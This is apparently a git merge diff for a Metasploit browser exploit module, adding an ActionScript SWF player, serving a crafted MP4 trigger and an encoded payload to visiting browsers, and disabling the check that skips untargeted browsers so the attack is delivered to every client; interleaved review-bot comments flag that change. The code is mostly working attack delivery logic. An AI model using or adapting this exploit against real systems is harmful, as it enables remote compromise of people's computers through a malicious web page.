Merge branch 'mp4-player'
commit
0c70586625
|
@ -0,0 +1,22 @@
|
|||
function randText(newLength:Number):String{
|
||||
var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
|
||||
var alphabet:Array = a.split("");
|
||||
var randomLetter:String = "";
|
||||
for (var i:Number = 0; i < newLength; i++){
|
||||
randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
|
||||
}
|
||||
return randomLetter;
|
||||
}
|
||||
|
||||
var connect_nc:NetConnection = new NetConnection();
|
||||
connect_nc.connect(null);
|
||||
|
||||
var stream_ns:NetStream = new NetStream(connect_nc);
|
||||
stream_ns.onStatus = function(p_evt:Object):Void { }
|
||||
|
||||
|
||||
video.attachVideo(stream_ns);
|
||||
|
||||
stream_ns.play(randText(Math.floor(Math.random() * 8) + 4) + ".mp4");
|
||||
|
||||
|
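Review bot: Nothing in this new file says which committed binary it compiles to, so the two "Binary file not shown" entries that follow cannot be checked against their source. A header comment such as `// Source for data/exploits/mp4player.swf (build tool and version: <fill in>)` would tie them together; that path is the one `create_swf` reads in the module, and whether either binary is that file is an inference from this page. The empty `stream_ns.onStatus` handler also discards every stream status event, so a one-line comment saying that is deliberate would help the next reader.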
Binary file not shown.
Binary file not shown.
|
@ -69,8 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
|
||||
OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -94,19 +93,32 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
#send_not_found(cli)
|
||||
#return
|
||||
my_target = targets[1]
|
||||
end
|
||||
|
||||
# The SWF requests our MP4 trigger
|
||||
if request.uri =~ /\.mp4$/
|
||||
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
|
||||
#print_error("Sorry, not sending you the mp4 for now")
|
||||
#send_not_found(cli)
|
||||
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
|
||||
return
|
||||
end
|
||||
|
||||
# The SWF request itself
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
|
||||
return
|
||||
end
|
||||
|
||||
# Redirect to a trailing slash so relative paths work properly
|
||||
if resource_uri != "/" and not request.uri.index("#{resource_uri}/")
|
||||
uri = resource_uri + "/"
|
||||
send_redirect(cli, uri)
|
||||
return
|
||||
end
|
||||
|
||||
# Set payload depending on target
|
||||
p = payload.encoded
|
||||
|
||||
|
@ -140,8 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
|
||||
mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
|
||||
swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
|
||||
swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
|
||||
|
||||
html = %Q|
|
||||
<html>
|
||||
|
@ -166,9 +177,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
@mp4 = create_mp4
|
||||
@swf = create_swf
|
||||
super
|
||||
end
|
||||
|
||||
def create_swf
|
||||
path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" )
|
||||
fd = ::File.open( path, "rb" )
|
||||
swf = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
return swf
|
||||
end
|
||||
|
||||
def create_mp4
|
||||
ftypAtom = "\x00\x00\x00\x20" #Size
|
||||
ftypAtom << "ftypisom"
|
||||
|
|
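Review bot: In the `my_target.nil?` branch (hunk at -94/+93), the early exit appears to be commented out and replaced with `my_target = targets[1]`, so a client that matched no target is no longer turned away; the page has lost its added/removed markers, so this reading is inferred from the hunk counts. That contradicts the comment above the branch and the `print_error` text, which still says the attack will not be launched, and it widens delivery to browsers outside the module's declared target list. Unless the fallback is deliberate, restore `send_not_found(cli)` and `return` and drop the forced target; if it is deliberate, the comment and log message need to say so. The `.mp4` branch in the same hunk also keeps two commented-out debugging lines that should be deleted before merge. The enclosing request handler starts and ends outside the hunk.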